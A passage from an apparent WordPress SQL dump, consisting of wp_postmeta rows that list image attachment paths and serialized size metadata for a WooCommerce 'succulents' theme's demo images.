;s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product12-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(271,3454,'_wp_attachment_image_alt',''),(272,3505,'_wp_attached_file','2018/02/landing-slide4-graphic2.png'),(273,3505,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:914;s:6:\"height\";i:860;s:4:\"file\";s:35:\"2018/02/landing-slide4-graphic2.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide4-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-600x565.png\";s:5:\"width\";i:600;s:6:\"height\";i:565;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-300x282.png\";s:5:\"width\";i:300;s:6:\"height\";i:282;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-768x723.png\";s:5:\"width\";i:768;s:6:\"height\";i:723;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-914x550.png\";s:5:\"width\";i:914;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-550x860.png\";s:5:\"width\";i:550;s:6:\"height\";i:860;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide4-graphic2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-600x565.png\";s:5:\"width\";i:600;s:6:\"height\";i:565;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide4-graphic2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(274,4076,'_wp_attachment_image_alt','j'),(275,2061,'_wp_attachment_image_alt','a'),(276,1130,'_wp_attachment_image_alt','a'),(277,4108,'_wp_attached_file','2018/03/h5-tabs-img-1.png'),(278,4108,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:244;s:6:\"height\";i:242;s:4:\"file\";s:25:\"2018/03/h5-tabs-img-1.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-244x240.png\";s:5:\"width\";i:244;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(279,2115,'_wp_attached_file','2018/01/blog-img-17.jpg'),(280,2115,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:23:\"2018/01/blog-img-17.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"blog-img-17-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"blog-img-17-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blog-img-17-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"blog-img-17-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"blog-img-17-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"blog-img-17-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"blog-img-17-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"blog-img-17-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"blog-img-17-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"blog-img-17-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"blog-img-17-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"blog-img-17-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(281,1132,'_wp_attached_file','2018/01/product11-gallery1.jpg'),(282,1132,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product11-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product11-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product11-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(283,4108,'_wp_attachment_image_alt','s'),(284,88,'_wp_attachment_image_alt','o'),(285,4109,'_wp_attached_file','2018/03/h5-tabs-img-2.png'),(286,4109,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:192;s:6:\"height\";i:242;s:4:\"file\";s:25:\"2018/03/h5-tabs-img-2.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-2-192x240.png\";s:5:\"width\";i:192;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(287,670,'_wp_attachment_image_alt','a'),(288,91,'_wp_attached_file','2018/01/testimonials-background.jpg'),(289,91,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:35:\"2018/01/testimonials-background.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"testimonials-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"testimonials-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"testimonials-background-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"testimonials-background-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"testimonials-background-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"testimonials-background-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"testimonials-background-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"testimonials-background-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"testimonials-background-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"testimonials-background-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"testimonials-background-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"testimonials-background-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"testimonials-background-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:37:\"testimonials-background-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"testimonials-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"testimonials-background-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"testimonials-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(290,1132,'_wp_attachment_image_alt','a'),(291,4109,'_wp_attachment_image_alt','m'),(292,708,'_wp_attached_file','2018/01/h4-img-2.jpg'),(293,708,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:350;s:4:\"file\";s:20:\"2018/01/h4-img-2.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h4-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h4-img-2-350x300.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h4-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h4-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(294,1133,'_wp_attached_file','2018/01/product11-gallery2.jpg'),(295,1133,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product11-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product11-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product11-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product11-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(296,4110,'_wp_attached_file','2018/03/h5-tabs-img-3.png'),(297,4110,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:242;s:6:\"height\";i:242;s:4:\"file\";s:25:\"2018/03/h5-tabs-img-3.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-3-242x240.png\";s:5:\"width\";i:242;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(298,4110,'_wp_attachment_image_alt','m'),(299,708,'_wp_attachment_image_alt','o'),(300,4111,'_wp_attached_file','2018/03/h5-tabs-img-4.png'),(301,4111,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:249;s:6:\"height\";i:242;s:4:\"file\";s:25:\"2018/03/h5-tabs-img-4.png\";s:5:\"sizes\";a:4:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-4-249x240.png\";s:5:\"width\";i:249;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-tabs-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(302,1458,'_wp_attachment_image_alt','a'),(303,4111,'_wp_attachment_image_alt','m'),(304,709,'_wp_attached_file','2018/01/h4-img-3.jpg'),(305,709,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:350;s:6:\"height\";i:700;s:4:\"file\";s:20:\"2018/01/h4-img-3.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h4-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h4-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h4-img-3-150x